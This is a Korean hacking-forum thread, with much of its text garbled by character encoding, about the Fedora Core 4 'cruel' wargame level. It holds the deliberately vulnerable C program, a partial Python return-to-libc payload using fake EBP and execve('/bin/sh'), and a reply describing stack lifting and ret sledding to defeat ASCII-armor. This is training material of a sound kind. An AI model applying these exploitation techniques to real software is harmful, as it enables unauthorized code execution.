·¹º§ ÇØÅ·

 2840, 1/142 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   vngkv123
   fedora core4 cruel Áú¹®

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=3361 [º¹»ç]


sfp¸¦ üũÇÏÁö ¾Ê´Â°É ÀÌ¿ëÇؼ­ Ç®·Á°í Çߴµ¥ ±Ã±ÝÇÑ°Ô À־ 2°¡Áö¸¸ Áú¹® µå·Áº¼°Ô¿ë .....

1. fedora core4ºÎÅÍ Æ¯Á¤ÇÔ¼öµéÀÌ esp¸¦ ±âÁØÀ¸·Î ÂüÁ¶ÇѴٴµ¥ ÇØ´çÇÔ¼öµéÀ» °üÂûÇغ¸´Ï ÀϹÝÀûÀ¸·Î gdb·Î º¸¸é esp¸¦ ±âÁØÀ¸·Î Àâ¾Æ¿À´Â°Í °°Àºµ¥ set disassembly-flavor intel·Î ¼³Á¤ÇÏ°í ”fÀ»½Ã¿£ ¿©ÀüÈ÷ ebp¸¦ ±âÁØÀ¸·Î ÀÎÀÚµéÀ» ÂüÁ¶Çß½À´Ï´Ù.
±×·¡¼­ °ø°ÝÀ» buf | dummy | sfp | ret | canary | temp stdin | Á¡À» ÀÌ¿ëÇÏ¿©
fake ebp¸¦ ÀÌ¿ëÇÏ¿©  temp stdin¿¡ ebp¸¦ µÎ°í execve(±×¸®°í system) + Dummy[4Byte] + &"/bin/sh"·Î ³Ö¾ú´Âµ¥ ÀüÇô ½ÇÇàÀÌ ¾ÈµÇ³×¿ä ¤Ð¤Ð ¶óÀÌÆ®¾÷¿¡´Â &"/bin/sh"ÀÌÈÄ¿¡ ´Ù¸¥ °ªµéÀ» ÁÖ´øµ¥ ¿Ö ±×·±Áö ÀÌÇظ¦ ¸øÇÏ°Ú³×¿ä ¤Ð

2. ´ñ±ÛÂÊ¿¡ ¼Ò½º¸¦ Âü°íÇҰǵ¥ ÀÌ ºÎºÐÀ» ¾î¶»°Ô üũÇϴ°ÇÁö Àß ¸ð¸£°Ú³×¿ë..
// preventing RTL
        ret = &canary - 1;
        if((*ret & 0xff000000) == 0)
        {
                printf("I've an allergy to NULL");
                exit(1);
        }
  Hit : 3796     Date : 2017/03/29 06:44


    
vngkv123 #include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int vuln(int canary,char *ptr)
{
char buffer[256];
int *ret;

// stack overflow!!
strcpy(buffer,ptr);

// overflow protected
if(canary != 0x31337)
{
printf("who broke my canary?!");
exit(1);
}

// preventing RTL
ret = &canary - 1;
if((*ret & 0xff000000) == 0)
{
printf("I've an allergy to NULL");
exit(1);
}

// clearing attack buffer
memset(ptr, 0, 1024);

return 0;
}

int main()
{
char buffer[1024];

printf("enigma : The brothers will be glad to have you!\n");
printf("you : ");
fflush(stdout);

// give me a food!
fgets(buffer, 1024, stdin);

// oops~!
vuln(0x31337, buffer);

// bye bye
exit(0);
}		 2017/03/29  
vngkv123 ÆÄÀ̽ã ÀͽºÄÚµå´Â ÀÌ·¸½À´Ï´Ù
import struct
import os
import socket
import time

p = lambda x : struct.pack("<L",x)

leaveret = 0x0804858e
canary = 0x31337
execve = 0x832abc
stdin = 0xb7f89000
system = 0x7db0e7
binsh = 0x8bd987


payload = "A"*260
payload += p(stdin + 0x110) + p(leaveret) + p(canary)
payload += p(stdin + 0x114)
payload += p(execve) + "A"*4 + p(binsh) + p(stdin + 0x11c) + p(0x0)		 2017/03/29  
ÇØÄð·¯ ¾ÆÇÏ ¿À·¡ÀüÀ̶ó Àß ±â¾ïÀº ¾È³ªÁö¸¸ ¾Æ¸¶ fc4¿¡´Â Solar Designer°¡ Á¦¾ÈÇÑ ¾Æ½ºÅ°¾Æ¸Ó°¡ ¾ÆÁ÷ »ç¿ëµÇ´ø ½Ã±â¿´À» °Ì´Ï´Ù
±×·¡¼­ ¶óÀ̺귯¸® ÁÖ¼Ò¿¡ RTL ÀÎÀÚÀü´ÞÀ» ¸·±âÀ§ÇÑ null¹ÙÀÌÆ®°¡ ÃÖ»óÀ§¹ÙÀÌÆ®¿¡ Ç×»ó Á¸ÀçÇÏÁÒ

±×¸®°í Àç¹Õ´Â°Ç ÀÔ·ÂÀ» vuln¿¡¼­ ¹Þ´Â°Ô ¾Æ´Ï¶ó main¿¡¼­ ¹Þ¾Æ¼­ ³Ñ±â±â ¶§¹®¿¡
vulnÇÔ¼öÀÇ ¸®ÅϾîµå·¹½º ÀÌÈÄ·Î Ä«³ª¸®¿Í ¹öÆÛÁÖ¼Ò°¡ ÀÖ°í ¹Ù·Î ¹öÆÛÀÇ ÄÁÅÙÆ®°¡ À̾îÁý´Ï´Ù
°á±¹ Æä1À̷ε带 ret³Ê¸Ó 1024¹ÙÀÌÆ®¸¸Å­ ´õ ¾µ¼öµµÀÖ´Ü ¼Ò¸®ÁÒ
add esp °¡Á¬À» ÀÌ¿ëÇØ stack liftingÀ» Çϼż­ bufferÀÇ Ã¹½ÃÀÛÁîÀ½ºÎÅÍ RET SleddingÀ» Çϼż­ vulnÀÇ ¹öÆÛ¸¦ ¿À¹öÇÃ·Î¿ì ½Ãų¼ö ÀÖÀ»¸¸Å­ ret sleddingÀ» ÇϽŴÙÀ½¿¡ vulnÀÇ ¸®ÅÏÀÚ¸®¿¡´Â stack lifting + ret À» ³ÖÀ¸½Ã°í ±×´ÙÀ½¿¡ Ä«³ª¸®¸¦ ±âÁØÀ¸·Î vulnÀº strcpy¸¦ ¹«Á¶°Ç Á¾·áÇØ¾ß ÇÏ´Ï ±× ÀÌÈÄ¿¡ NULL¹ÙÀÌÆ®¸¦ Æ÷ÇÔÇÑ RTL Æä1À̷ε带 ³ÖÀ¸½Ã¸é µË´Ï´Ù		 2017/03/30  
ÇØÄð·¯ ±×·¯´Ï±î ÀÔ·ÂÀº ÇϳªÁö¸¸ °ø°ÝÀÇ phase¸¦ µÎ´Ü°è·Î ³ª´²¼­ »ý°¢ÇÏ½Ã¸é µË´Ï´Ù 2017/03/30